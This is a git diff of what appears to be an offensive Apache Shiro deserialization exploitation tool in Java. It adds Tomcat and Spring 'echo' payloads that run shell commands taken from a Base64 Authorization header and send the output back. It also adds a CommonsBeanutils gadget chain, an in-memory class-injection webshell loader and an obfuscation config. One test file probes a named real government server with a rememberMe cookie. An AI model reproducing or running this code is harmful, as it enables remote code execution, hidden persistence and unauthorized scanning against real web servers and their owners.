diff --git a/pom.xml b/pom.xml index 8269d78..6b344cb 100644 --- a/pom.xml +++ b/pom.xml @@ -236,7 +236,7 @@ org.apache.logging.log4j log4j-api - 2.13.3 + 2.14.1 com.arronlong @@ -300,7 +300,11 @@ hutool-all 5.7.13 - + + javassist + javassist + 3.12.0.GA + diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java index f7f2e80..265d54a 100644 --- a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java +++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java @@ -77,6 +77,7 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N " if (var3 != null && !var3.isEmpty()) {\n" + " var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" + " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" + +// " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Setcoolie\"), var3});\n" + " var4 = true;\n" + " }\n" + "\n" + diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java new file mode 100644 index 0000000..19a63c1 --- /dev/null +++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java @@ -0,0 +1,128 @@ +package com.summersec.attack.deser.echo; + +import javassist.*; + +import java.io.IOException; + +/** + * @ClassName: TomcatEcho2 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 11:33 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho2 implements EchoPayload{ + @Override + public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException { + final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime()); + if (clazz.getDeclaredConstructors().length != 0) { + clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); + } + + + + clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" + + " byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" + + " Object var2;\n" + + " Class var3;\n" + + " try {\n" + + " var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" + + " var2 = var3.newInstance();\n" + + " var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" + + " var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + + " } catch (Exception var5) {\n" + + " var3 = Class.forName(\"java.nio.ByteBuffer\");\n" + + " var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" + + " var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + + " } \n" + + " }",clazz)); + + clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" + + " java.lang.reflect.Field var2 = null;\n" + + " Class var3 = var0.getClass();\n" + + "\n" + + " while(var3 != Object.class) {\n" + + " try {\n" + + " var2 = var3.getDeclaredField(var1);\n" + + " break;\n" + + " } catch (NoSuchFieldException var5) {\n" + + " var3 = var3.getSuperclass();\n" + + " }\n" + + " }\n" + + "\n" + + " if (var2 == null) {\n" + + " throw new NoSuchFieldException(var1);\n" + + " } else {\n" + + " var2.setAccessible(true);\n" + + " return var2.get(var0);\n" + + " }\n" + + " }", clazz)); + clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" + + " boolean var4 = false;\n" + + " Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" + + " for (int var6 = 0; var6 < var5.length; ++var6) {\n" + + " Thread var7 = var5[var6];\n" + + " if (var7 != null) {\n" + + " String var3 = var7.getName();\n" + + " if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" + + " Object var1 = getFV(var7, \"target\");\n" + + " if (var1 instanceof Runnable) {\n" + + " try {\n" + + " var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" + + " } catch (Exception var13) {\n" + + " continue;\n" + + " }\n" + + " java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" + + "\n" + + " for(int var10 = 0; var10 < var9.size(); ++var10) {\n" + + " Object var11 = var9.get(var10);\n" + + " var1 = getFV(var11, \"req\");\n" + + " Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" + + " try {\n" + + "\n" + + "\n" + + " var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" + + " if (var3 != null && !var3.isEmpty()) {\n" + + " var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" + + " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" + + " var4 = true;\n" + + " }\n" + + "\n" + + " var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" + + " if (var3 != null && !var3.isEmpty()) {\n" + + " var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" + + " String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" + + " writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" + + " var4 = true;\n" + + " }\n" + + "\n" + + " if (var4) {\n" + + " break;\n" + + " }\n" + + " }catch (Exception var14) {\n" + + " writeBody(var2, var14.getMessage().getBytes());\n" + + " }\n" + + " }\n" + + "\n" + + " if (var4) {\n" + + " break;\n" + + " }\n" + + " }\n" + + " }\n" + + " }\n" + + " }\n" + + " }",clazz)); + + return clazz; + } + + + public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException { + ClassPool pool = ClassPool.getDefault(); +// TomcatEcho2 tomcatEcho2 = new TomcatEcho2(); + SpringEcho springEcho = new SpringEcho(); + springEcho.genPayload(pool); +// tomcatEcho2.genPayload(pool); + } +} diff --git a/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java new file mode 100644 index 0000000..5072924 --- /dev/null +++ b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java @@ -0,0 +1,57 @@ +package com.summersec.attack.deser.payloads; + +import com.summersec.attack.deser.payloads.annotation.Authors; +import com.summersec.attack.deser.payloads.annotation.Dependencies; +import com.summersec.attack.deser.util.JavassistClassLoader; +import com.summersec.attack.deser.util.Reflections; +import java.util.Comparator; +import java.util.PriorityQueue; +import java.util.Queue; + +import com.summersec.attack.deser.util.StandardExecutorClassLoader; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + + +@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"}) +@Authors({"phith0n"}) +public class CommonsBeanutilsString_192s implements ObjectPayload> { + @Override + public Queue getObject(Object template) throws Exception { + + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); + final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); + + try { + CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID"); + beanComparator.removeField(ctSUID); + }catch (javassist.NotFoundException e){} + beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator)); + // mock method name until armed + final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance(); + beanComparator.defrost(); + + PriorityQueue queue = new PriorityQueue(2, (Comparator)comparator); + + queue.add("1"); + queue.add("1"); + + Reflections.setFieldValue(queue, "queue", new Object[] { template, template }); + + Reflections.setFieldValue(beanComparator, "property", "outputProperties"); + + return (Queue)queue; + } + + public static void main(String[] args) throws Exception { + CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s(); + commonsBeanutilsString192.getObject(new Object()); + + } +} + + + diff --git a/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java b/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java index 2b9ec3e..406298b 100644 --- a/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java +++ b/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java @@ -17,7 +17,7 @@ public CtClass genPayload(ClassPool pool) throws Exception { } clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz)); - clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz)); + clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String user = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n user = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"user\")});\n\n if (user != null && !user.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(user);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz)); return clazz; } diff --git a/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java b/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java new file mode 100644 index 0000000..2c901c3 --- /dev/null +++ b/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java @@ -0,0 +1,15 @@ +package com.summersec.attack.deser.util; + +/** + * @ClassName: JavassistClassLoader + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/24 16:34 + * @Version: v1.0.0 + * @Description: + **/ +public class JavassistClassLoader extends ClassLoader { + public JavassistClassLoader(){ + super(Thread.currentThread().getContextClassLoader()); + } +} \ No newline at end of file diff --git a/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java b/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java index 9b2ccfa..ce67781 100644 --- a/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java +++ b/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java @@ -39,10 +39,11 @@ private void loadResource(String version) { // 加载对应版本目录下的 Jar 包 tryLoadJarInDir(jarPath); // 加载对应版本目录下的 lib 目录下的 Jar 包 - tryLoadJarInDir(jarPath + File.separator + "lib"); +// tryLoadJarInDir(jarPath + File.separator + "lib"); } private void tryLoadJarInDir(String dirPath) { + System.out.println("Try load jar in dir: " + dirPath); File dir = new File(dirPath); // 自动加载目录下的jar包 if (dir.exists() && dir.isDirectory()) { diff --git a/src/main/resources/allatori.xml b/src/main/resources/allatori.xml new file mode 100644 index 0000000..f3948cd --- /dev/null +++ b/src/main/resources/allatori.xml @@ -0,0 +1,34 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/src/test/java/SpringEcho.java b/src/test/java/SpringEcho.java new file mode 100644 index 0000000..c4beaaa --- /dev/null +++ b/src/test/java/SpringEcho.java @@ -0,0 +1,35 @@ +/** + * @ClassName: SpringEcho + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 13:37 + * @Version: v1.0.0 + * @Description: + **/ +public class SpringEcho { + public SpringEcho() throws Exception { + try { + org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes(); + javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest(); + javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse(); + + String te = httprequest.getHeader("Host"); + httpresponse.addHeader("Host", te); + String tc = httprequest.getHeader("Authorization"); + if (tc != null && !tc.isEmpty()) { + String p = org.apache.shiro.codec.Base64.decodeToString(tc.replaceAll("Basic ", "")); + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + String base64Str = ""; + base64Str = org.apache.shiro.codec.Base64.encodeToString(result); + httpresponse.getWriter().write("$$$" + base64Str + "$$$"); + + } + httpresponse.getWriter().flush(); + httpresponse.getWriter().close(); + } catch (Exception e) { + e.getStackTrace(); + } + } + +} diff --git a/src/test/java/TomcatEcho.java b/src/test/java/TomcatEcho.java new file mode 100644 index 0000000..364b65a --- /dev/null +++ b/src/test/java/TomcatEcho.java @@ -0,0 +1,101 @@ +/** + * @ClassName: tomcat1 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 13:20 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho { + public TomcatEcho() throws Exception { + boolean var4 = false; + Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads"); + for (int var6 = 0; var6 < var5.length; ++var6) { + Thread var7 = var5[var6]; + if (var7 != null) { + String var3 = var7.getName(); + if (!var3.contains("exec") && var3.contains("http")) { + Object var1 = getFV(var7, "target"); + if (var1 instanceof Runnable) { + try { + var1 = getFV(getFV(getFV(var1, "this$0"), "handler"), "global"); + } catch (Exception var13) { + continue; + } + java.util.List var9 = (java.util.List) getFV(var1, "processors"); + + for(int var10 = 0; var10 < var9.size(); ++var10) { + Object var11 = var9.get(var10); + var1 = getFV(var11, "req"); + Object var2 = var1.getClass().getMethod("getResponse",new Class[0]).invoke(var1, new Object[0]); + try { + + + var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Host")}); + if (var3 != null && !var3.isEmpty()) { + var2.getClass().getMethod("setStatus", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)}); + var2.getClass().getMethod("addHeader", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String("Host"), var3}); + var4 = true; + } + + var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Authorization")}); + if (var3 != null && !var3.isEmpty()) { + var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll("Basic ", "")); + String[] var12 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var3} : new String[]{"/bin/sh", "-c", var3}; + writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter("\\A").next().getBytes()); + var4 = true; + } + + if (var4) { + break; + } + }catch (Exception var14) { + writeBody(var2, var14.getMessage().getBytes()); + } + } + + if (var4) { + break; + } + } + } + } + } + } + private static Object getFV(Object var0, String var1) throws Exception { + java.lang.reflect.Field var2 = null; + Class var3 = var0.getClass(); + + while(var3 != Object.class) { + try { + var2 = var3.getDeclaredField(var1); + break; + } catch (NoSuchFieldException var5) { + var3 = var3.getSuperclass(); + } + } + + if (var2 == null) { + throw new NoSuchFieldException(var1); + } else { + var2.setAccessible(true); + return var2.get(var0); + } + } + private static void writeBody(Object var0, byte[] var1) throws Exception { + byte[] bs = ("$$$" + org.apache.shiro.codec.Base64.encodeToString(var1) + "$$$").getBytes(); + Object var2; + Class var3; + try { + var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); + var2 = var3.newInstance(); + var3.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)}); + var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2}); + } catch (Exception var5) { + var3 = Class.forName("java.nio.ByteBuffer"); + var2 = var3.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(var3, new Object[]{bs}); + var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2}); + } + + } +} diff --git a/src/test/java/TomcatEcho2.java b/src/test/java/TomcatEcho2.java new file mode 100644 index 0000000..d933f9b --- /dev/null +++ b/src/test/java/TomcatEcho2.java @@ -0,0 +1,79 @@ + + +/** + * @ClassName: tomcat2 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 11:36 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho2 { + public TomcatEcho2() throws Exception { + try { + javax.management.MBeanServer var2 = org.apache.tomcat.util.modeler.Registry.getRegistry(null, null).getMBeanServer(); + String var3 = var2.queryNames(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,name=*http*"), (javax.management.QueryExp)null).iterator().next().toString(); + java.util.regex.Matcher var4 = java.util.regex.Pattern.compile("Catalina:(type=.*),(name=.*)").matcher(var3); + if (var4.find()) { + var3 = var4.group(2) + "," + var4.group(1); + } + java.lang.reflect.Field var5 = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + var5.setAccessible(true); + Object var6 = var5.get(var2); + var5 = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb"); + var5.setAccessible(true); + java.util.HashMap var7 = (java.util.HashMap)var5.get(var6); + var6 = ((java.util.HashMap)var7.get("Catalina")).get(var3); + var5 = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + var5.setAccessible(true); + java.util.ArrayList var8 = (java.util.ArrayList)var5.get(var6); + var5 = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + var5.setAccessible(true); + for(int var9 = 0; var9 < var8.size(); ++var9) { + org.apache.coyote.Request var10 = (org.apache.coyote.Request)var5.get(var8.get(var9)); + String var11 = var10.getHeader("Authorization"); + String s = var10.getHeader("Host"); + if (var11 != null) { + var11 = org.apache.shiro.codec.Base64.decodeToString(var11.replaceAll("Basic ", "")); + java.io.InputStream var12 = Runtime.getRuntime().exec(System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"cmd.exe", "/c", var11} : new String[]{"sh", "-c", var11}).getInputStream(); + java.util.Scanner var13 = (new java.util.Scanner(var12)).useDelimiter("\\a"); + String var14 = var13.hasNext() ? var13.next() : ""; + var10.getResponse().setStatus(200); + var10.getResponse().addHeader("Host", s); + var10.getResponse().addHeader("Set-Cookie", "$$$"+org.apache.shiro.codec.Base64.encodeToString(var14.getBytes())+"$$$"); + break; + } + } + } catch (Exception var25) { + } + javax.servlet.http.HttpServletRequest var16; + javax.servlet.http.HttpServletResponse var21 = ((org.springframework.web.context.request.ServletRequestAttributes) org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getResponse(); + var16 = ((org.springframework.web.context.request.ServletRequestAttributes) org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest(); + String var17 = var16.getHeader("Authorization"); + String s = var16.getHeader("Host"); + if (var17 != null) { + var17 = org.apache.shiro.codec.Base64.decodeToString(var17.replaceAll("Basic ", "")); + java.io.InputStream var18 = Runtime.getRuntime().exec(var17).getInputStream(); + java.util.Scanner var19 = (new java.util.Scanner(var18)).useDelimiter("\\a"); + String var20 = var19.hasNext() ? var19.next() : ""; + var21.setStatus(200); + var21.addHeader("Host", s); + var21.getWriter().println("$$$" +org.apache.shiro.codec.Base64.encodeToString( var20.getBytes()) + "$$$"); + }else { + var21.setStatus(200); + var21.addHeader("Host", s); + } + + + } + +} diff --git a/src/test/java/http.java b/src/test/java/http.java new file mode 100644 index 0000000..bcfeff3 --- /dev/null +++ b/src/test/java/http.java @@ -0,0 +1,27 @@ +import cn.hutool.http.HttpRequest; +import cn.hutool.http.HttpResponse; + +import java.util.List; + +/** + * @ClassName: http + * @Description: TODO + * @Author: Summer + * @Date: 2021/9/25 13:37 + * @Version: v1.0.0 + * @Description: + **/ +public class http { + public static void main(String[] args) { + String tar = "http://cms.changdu.gov.cn:8002/uas-center/a/cas"; + HttpResponse re = HttpRequest.get(tar) + .header("Cookie","rememberMe=1") + .execute(); + + List resp = re.headerList("Set-Cookie"); + + System.out.println(resp); + System.out.println(resp.toString()); + + } +} diff --git a/src/test/java/qwe.java b/src/test/java/qwe.java new file mode 100644 index 0000000..c6d1d27 --- /dev/null +++ b/src/test/java/qwe.java @@ -0,0 +1,31 @@ +import org.apache.shiro.codec.Base64; + +import javax.crypto.KeyGenerator; +import javax.crypto.SecretKey; +import java.security.NoSuchAlgorithmException; + +/** + * @ClassName: qwe + * @Description: TODO + * @Author: Summer + * @Date: 2021/10/19 13:51 + * @Version: v1.0.0 + * @Description: + **/ +public class qwe { + public static void main(String[] args) { +// KeyGenerator keygen = null; +// try { +// keygen = KeyGenerator.getInstance("AES"); +// } catch (NoSuchAlgorithmException e) { +// e.printStackTrace(); +// } +// SecretKey deskey = keygen.generateKey(); +//// System.out.println(Base64.encodeToString(deskey.getEncoded())); +// System.out.println(Base64.encodeToString(new byte[]{101, -88, 60, -121, -55, 13, -27, -8, -27, -32, 18, -11, 106, 7, 15, -11})); + + String s = "Basic YWxhZGRpbjpvcGVuc2VzYW1l"; + System.out.println(s.replaceAll("Basic", "")); + } + +} diff --git a/src/test/java/qweasd.java b/src/test/java/qweasd.java new file mode 100644 index 0000000..af8438a --- /dev/null +++ b/src/test/java/qweasd.java @@ -0,0 +1,20 @@ +import sun.misc.BASE64Encoder; + +/** + * @ClassName: qweasd + * @Description: TODO + * @Author: Summer + * @Date: 2021/10/20 16:30 + * @Version: v1.0.0 + * @Description: + **/ +public class qweasd { + public static void main(String[] args) { + System.out.println(System.getProperty("usr.dir")); + sun.misc.BASE64Encoder base64Encoder = new BASE64Encoder(); +// base64Encoder. +// base64Encoder.encodeBuffer(""); +// java.util.Base64.getEncoder().encode() + + } +} diff --git a/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class b/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class index 84f7f19..c69dd07 100644 Binary files a/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class and b/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class differ diff --git a/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class b/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class index b6a80d0..adac6a6 100644 Binary files a/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class and b/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class differ diff --git a/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class b/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class index 19dcfbb..5c5fad3 100644 Binary files a/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class and b/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class differ